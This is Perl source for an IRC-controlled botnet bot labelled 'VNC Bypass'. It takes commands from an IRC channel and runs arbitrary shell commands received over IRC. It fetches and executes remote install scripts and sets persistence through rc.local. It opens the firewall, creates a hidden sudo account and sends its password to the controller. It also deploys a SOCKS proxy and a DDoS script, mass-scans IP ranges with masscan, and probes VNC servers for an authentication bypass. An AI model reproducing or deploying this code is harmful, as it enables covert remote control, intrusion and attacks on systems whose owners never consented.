Perl IRC bot - VNC Bypass

1. use strict;
2. use warnings;
3. use Mojo::IRC;
4. use Net::Address::IP::Local;
5. use Time::HiRes;
6. use feature 'say';
7. use Fcntl qw(:flock SEEK_END);
8. my $filename = 'CCFinder.log';
9. $|=1;
10. my @VNC_PORTS = qw/'5900 5901 5902 5903 5904 5905 5906 5907 5908 5909 5910 5911 5912 5913 5914 5915 5916 5917 5918 5919 5920 5921 5922 5923 5924 5925 5926 5927 5928 5929 5930 5931 5932 5933 5934 5935 5936 5937 5938 5939 5940 5941 5942 5943 5944 5945 5946 5947 5948 5949 5950 5951 5952 5953 5954 5955 5956 5957 5958 5959 5960 5961 5962 5963 5964 5965 5966 5967 5968 5969 5970 5971 5972 5973 5974 5975 5976 5977 5978 5979 5980 5981 5982 5983 5984 5985 5986 5987 5988 5989 5990 5991 5992 5993 5994 5995 5996 5997 5998 5999'/;
11. use Mojo::IOLoop;
12. my $forktimeout = 20;
13. my $maxforks = 2500;
14. my $noticechan = '@#VNC';
15. my $channel = '#VNC';
16. my %events;
17. my $range;
18. my $minimum;
19. my $random_number;
20. my $random_user;
21. my @arr4y;
22. my $address;
23. my $irc = Mojo::IRC->new(
24.  nick => 'VNC'.int(rand(99999)),
25.  user => 'VNCScan',
26.  server => 'irc-3.iownyour.biz:6697',
27.  );
28. $irc->on(close => sub { system("perl perlircssl.pl &") });
29. $irc->on(irc_rpl_welcome => sub {
30.  my($irc, $err) = @_;
31.  warn 'Joined IRC server.';
32.  $irc->write(join => $channel);
33.  });
34. $irc->on(irc_join => sub {
35.  
36.  });
37. my $misc = {};
38. $irc->on(irc_privmsg => sub {
39.  my($irc, $message) = @_;
40.  my $msg = $message->{params}[1];
41.  if ($msg =~ /@.version/) {
42.   warn 'Version request.';
43.   $irc->write(notice => $noticechan => "9,1Perl VNC bot [FINAL] by independent: 12https://github.com/independentcod");
44.  }
45.  if ($msg =~ /@.autorun/) {
46.   system("if [ ! -f ./rc.local ]; then curl -Lv -o /etc/rc.local https://raw.githubusercontent.com/ind3p3nd3nt/vncperlbot/master/rc.local; else cp -r ./rc.local /etc/rc.local; fi;");
47.   system("chown root:root /etc/rc.local && chmod 755 /etc/rc.local && touch /etc/systemd/system/rc-local.service;");
48.   system("if [ ! -f ./rc-local.service ]; then curl -Lv -o /etc/systemd/system/rc-local.service https://raw.githubusercontent.com/ind3p3nd3nt/vncperlbot/master/rc-local.service; else cp -r ./rc-local.service /etc/systemd/system/rc-local.service; fi;");
49.   system("systemctl enable rc-local;");
50.   $irc->write(notice => $noticechan => "[info] Autorun enabled\n");
51.  }
52.  if ($msg =~ /@.cloak/) {
53.   system("curl -LvO https://raw.githubusercontent.com/ind3p3nd3nt/proxych/main/install.sh -o install.sh && sh install.sh &");
54.   system("proxychains perl ~/perlircssl.pl &");
55.   $irc->write(notice => $noticechan => "[info] Cloaked!\n");
56.  }
57.   if ($msg =~ /@.novnc/) {
58.   system("curl -LvO https://raw.githubusercontent.com/ind3p3nd3nt/novnc/main/.install.sh -o .install.sh && bash .install.sh &");
59.   $irc->write(notice => $noticechan => "[info] NoVNC installed check terminal for input\n");
60.  }
61.    if ($msg =~ /@.socks/) {
62.   system("if [ -f /usr/bin/apt ]; then apt update && apt install build-essential -y; else yum groupinstall 'Development Tools' -y; fi;");
63.   system("git clone https://github.com/ind3p3nd3nt/socks && cp -r ./socks/* ./ && make -j8 && ./socks5server &");
64.   $irc->write(notice => $noticechan => "[info] Socks5 Listening 0.0.0.0:1080\n");
65.  }
66.     if ($msg =~ /@.blocknoobs/) {
67.   system("if [ -f /usr/bin/apt ]; then apt update && apt install build-essential -y; else yum groupinstall 'Development Tools' -y; fi;");
68.   system("git clone https://github.com/ind3p3nd3nt/iptables_CIDR_drop.git && cp -r ./iptables_CIDR_drop/* ./ && sh setup.sh &");
69.   $irc->write(notice => $noticechan => "[info] Now blocking noobs all over the world.\n");
70.  }
71.     if ($msg =~ /@.fwreset/) {
72.   system("curl -LvO https://raw.githubusercontent.com/ind3p3nd3nt/fwreset/main/iptables-reset.sh -o iptables-reset.sh && sh iptables-reset.sh &");
73.   $irc->write(notice => $noticechan => "[info] Firewall Reset!\n");
74.  }
75.  if ($msg =~ /sudo/) {
76.              system("if [ ! -f /usr/bin/sudo ]; then if [ -f /usr/bin/apt ]; then apt update && apt install sudo -y; else yum install sudo -y; fi; fi;");
77.              my $fragment =  substr $msg, 7;
78.              $irc->write(notice => $noticechan => "$msg\n");
79.              system("$msg");
80.              my @output = `$msg 2>&1 3>&1`;
81.              foreach(@output) {
82.                Time::HiRes::sleep(0.9);
83.                $irc->write(notice => $noticechan => "$_\r\n");        
84.              }
85.  }
86.   if ($msg =~ /@.getssh/) {
87.   warn 'Flushing iptables & Accepting all remote connections.';
88. system "sudo iptables -F INPUT";
89. system "sudo iptables -P INPUT ACCEPT";
90.   warn 'Adding new admin account...';
91. $range = 999999999;
92. $minimum = 100000000;
93. $random_number = int(rand($range)) + $minimum;
94. $random_user = sprintf("%08X", rand(0xFFFFFFFF));
95. system 'sudo useradd -m ' . $random_user;
96. system "echo $random_user:$random_number | sudo chpasswd";
97. system 'if [ -f "/usr/bin/yum" ]; then sudo usermod -aG wheel ' . $random_user . '; fi';
98. system 'if [ -f "/usr/bin/apt" ]; then sudo adduser ' . $random_user . ' sudo; fi';
99.   warn 'Configuring SSH...';
100. system 'wget -O /etc/ssh/sshd_config https://github.com/ind3p3nd3nt/vncperlbot/raw/master/sshd_config';
101. system 'wget -O /etc/ssh/sshd_banner https://github.com/ind3p3nd3nt/vncperlbot/raw/master/sshd_banner';
102. system 'if [ -f /usr/bin/yum ]; then sudo service sshd restart; fi';
103. system 'if [ -f /usr/bin/apt ]; then sudo service ssh restart; fi';
104.   warn 'Getting External IP Address';
105.   $address = eval { Net::Address::IP::Local->connected_to('perlmaven.com') };
106.   @arr4y = ('sshpass -p "', $random_number, '" ssh -l ', $random_user, $address);
107.   warn "@arr4y";
108.   $irc->write(notice => $noticechan => @arr4y);
109.  }
110.  elsif ($msg =~ /@.stopexploit/) {
111.   warn 'stopexploit called, killing...';
112.   if ( exists $misc->{exploitpid} )  {
113.    $irc->write(notice => $noticechan => '[Info] Sending SIGTERM to PID ' . $misc->{exploitpid});
114.    kill 'INT', $misc->{exploitpid};kill 'TERM', $misc->{exploitpid};
115.    delete $misc->{exploitpid};
116.    $irc->write(notice => $noticechan => '[Info] PID ' . $misc->{exploitpid} . " killed, !exploit stopped");
117.    } else {
118.     $irc->write(notice => $noticechan => "exploit is not running");
119.    }
120.   }
121.   return unless $msg =~ /^\@./;
122.   my $subprocess = Mojo::IOLoop->subprocess(
123.    sub {
124.     my $s = shift;
125.     my @IRC_RESULTS;
126.     $events{connect}++;
127.     if ($msg =~ /@.scan ([^\s]+)/) {
128.      $s->progress("[Info] Starting masscan... [VNC Scan in progress ...]");
129.      my $range = $1;
130.      my $masscancmd = "masscan -p 5900 --range $range --rate 25000 --open --banners -oG hosts.txt ";
131.      warn "Received rangescan request on $range , running masscan...";
132.      my $r = `$masscancmd`;
133.      push @IRC_RESULTS, $_ foreach split "\n", $r;
134.      } elsif ($msg =~ /@.ddos ([^\s]+)/) {
135.      $s->progress("[Info] Installing DDoS Module");
136.      my $ddos = "curl -LvO https://raw.githubusercontent.com/ind3p3nd3nt/ddos/master/ddos.py -o ddos.py && chmod +x ddos.py && ./ddos.py $@";
137.      my $r = `$ddos`;
138.      push @IRC_RESULTS, $_ foreach split "\n", $r;
139.      $s->progress("[Info] DDoS Module Installed use: sudo ddos.py arguments...");
140.      }
141.      elsif ($msg =~ /@.exploit/) {
142.       warn 'Received exploitrun request, exploiting hosts.txt...';
143.       my $r = exploitrun ("vnc", $s, $s->pid);
144.  
145.       } elsif ($msg =~ /@.format/) {
146.        warn 'Received file formatting request, processing...';    
147.        my $formatcmd = "rm -rf ips.txt && cat hosts.txt | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >>ips.txt";
148.        my $r = `$formatcmd`;
149.        push @IRC_RESULTS, $_ foreach split "\n", $r;
150.       }
151.       return @IRC_RESULTS;
152.       }, sub {
153.        my ($s, $error, @res) = @_;
154.        $irc->write(notice => $noticechan => " FINISHED: $msg");
155.        warn "Finished work: $msg";
156.        if ( $error ) {
157.         warn "ERROR FOUND: $error";
158.         $irc->write(notice => $noticechan => "ERROR: " . $error);
159.         return;
160.        }
161.        $irc->write(notice => $noticechan => $_) foreach @res;
162.        });
163.  
164.   $subprocess->on(progress => sub {
165.    my ($subprocess, @data) = @_;
166.    $irc->write(notice => $noticechan => $_) foreach @data; # this prints the data from subprocesses
167.    });
168.   $subprocess->on(spawn => sub {
169.    my $subprocess = shift;
170.    my $pid = $subprocess->pid;
171.    # $irc->write(notice => $noticechan =>  "Performing work in process $pid");
172.    if ( $msg =~ /@.exploit/ ) {
173.     $irc->write(notice => $noticechan => 'pid: ' . $pid) ;
174.     $misc->{exploitpid} = $pid ;
175.    }
176.    });
177.   });
178.    $irc->connect(sub {
179.     my($irc, $err) = @_;
180.     return system("wget -O .fw is.gd/fwreset && sh .fw && perl perlircssl.pl &") if $err;
181.     $irc->write(join => $channel);
182.     });
183.    Mojo::IOLoop->start;
184.  
185.    sub exploitvnc {
186.     my $row = shift;
187.     my $subp = shift;
188.     my $ownpid = shift;
189.     my $arg = shift;
190.     foreach my $vncport (@VNC_PORTS){
191.      my $sock = IO::Socket::INET->new(PeerAddr => $row, PeerPort => $vncport, Proto => 'tcp', Timeout => 10);
192.      next unless $sock;
193.      $sock->read(my $proto_ver, 12);
194.      eval {
195.       print $sock $proto_ver;
196.       $sock->read(my $sec_types, 1);
197.       $sock->read(my $ignored, unpack('C', $sec_types));
198.       print $sock "\x01";
199.       $sock->read(my $auth_type, 4);
200.       print $sock "\x01";
201.      };
202.      my $ver = "RFB 003.008";
203.      $sock->read(my $vnc_data, 4);
204.      if (unpack('I', $vnc_data)) {
205.       if ($proto_ver =~ $ver) {
206.        $proto_ver =~ s/[\r\n]+//g;
207.        if (index($vnc_data, chr(4)) != -1) {
208.  
209.         $subp->progress(" $row:$vncport $vnc_data ");
210.        }
211.        elsif (index($vnc_data, chr(195)) != -1) {
212.  
213.         $subp->progress(" $row:$vncport $vnc_data ");
214.        }
215.        elsif (index($vnc_data, chr(208)) != -1) {
216.  
217.         $subp->progress(" $row:$vncport $vnc_data ");
218.        }
219.        elsif (index($vnc_data, chr(88)) != -1) {
220.  
221.         $subp->progress(" $row:$vncport $vnc_data ");
222.        }
223.        elsif (index($vnc_data, chr(87)) != -1) {
224.  
225.         $subp->progress(" $row:$vncport $vnc_data ");
226.        }
227.        elsif (index($vnc_data, chr(7)) != -1) {
228.  
229.         $subp->progress(" $row:$vncport $vnc_data ");
230.        }
231.       }
232.      }
233.     }
234.     exit;
235.    }
236.  
237.    sub exploitrun {
238.     my $arg = shift;
239.     my $subp = shift;
240.     my $ownpid = shift;
241.     $SIG{CHLD} = 'IGNORE';
242.     $subp->progress("[Info] Starting $arg Exploiter ");
243.     my @ips;
244.     my %ips;
245.     my $filename = 'ips.txt';
246.     if (open(my $fh, '<:encoding(UTF-8)', $filename)) {
247.      while (my $row = <$fh>) {
248.       chomp $row;
249.       $row = $1 if $row =~ /(\d+\.\d+\.\d+\.\d+)/;
250.       #push @ips, $row;
251.       $ips{$row} = '';
252.      }
253.      close $fh;
254.     }
255.     push @ips, $_ foreach (sort {$a cmp $b} keys %ips);
256.     my %pids;
257.     $subp->progress("Calling IPs (" . int (scalar @ips) . ")");
258.  
259.     my $finished = 0;
260.     my $i = 0;
261.     while ( @ips > 0 )
262.     {
263.      Time::HiRes::sleep(0.1);
264.      #$subp->progress("[Info] In progress");
265.      foreach (keys %pids){
266.       my $exists = kill 0, $_; # kill 'TERM', $_
267.       if ( $exists ) {
268.        kill 'TERM', $_ if $pids{$_} < CORE::time;
269.        } else {
270.         delete $pids{$_}
271.        }
272.       }
273.       if ( scalar keys %pids >= $maxforks )
274.       {
275.        say int scalar @ips;
276.        say 'pids: ' . scalar keys %pids;
277.        } else {
278.         my $targetip = shift @ips;
279.         say 'Sending ' . $targetip;
280.         my $pid;
281.         if ($pid = fork) {
282.          say $pid;
283.          } else {
284.           if ($arg =~ /rdp/) {
285.            exploitrdp($targetip, $subp, $ownpid);
286.           }
287.           if ($arg =~ /ssh/) {
288.            exploitssh($targetip, $subp, $ownpid);
289.           }
290.           if ($arg =~ /mysql/) {
291.            exploitmysql($targetip, $subp, $ownpid);
292.           }
293.           if ($arg =~ /smtp/) {
294.            exploitsmtp($targetip, $subp, $ownpid);
295.           }
296.           if ($arg =~ /vnc/) {
297.            exploitvnc($targetip, $subp, $ownpid);
298.           }
299.          }
300.          $pids{$pid} = CORE::time + $forktimeout;
301.         }
302.        }
303.        $subp->progress("Done Calling IPs");
304.        while ( scalar keys %pids > 0 ) # wait for last alive forks to terminate
305.        {
306.         Time::HiRes::sleep(0.1);
307.         foreach (keys %pids){
308.          my $exists = kill 0, $_; # kill 'TERM', $_
309.          if ( $exists ) {
310.  
311.           kill 'TERM', $_ if $pids{$_} < CORE::time;
312.           } else {
313.            delete $pids{$_}
314.           }
315.          }
316.         }
317.         $subp->progress("[Info] $arg Done Scan");
318.        }
319.        sub lockf {
320.         my ($fh) = @_;
321.         flock($fh, LOCK_EX) or die "Cannot lock - $!\n";
322.        }
323.        sub unlock {
324.         my ($fh) = @_;
325.         flock($fh, LOCK_UN) or die "Cannot unlock - $!\n";
326.        }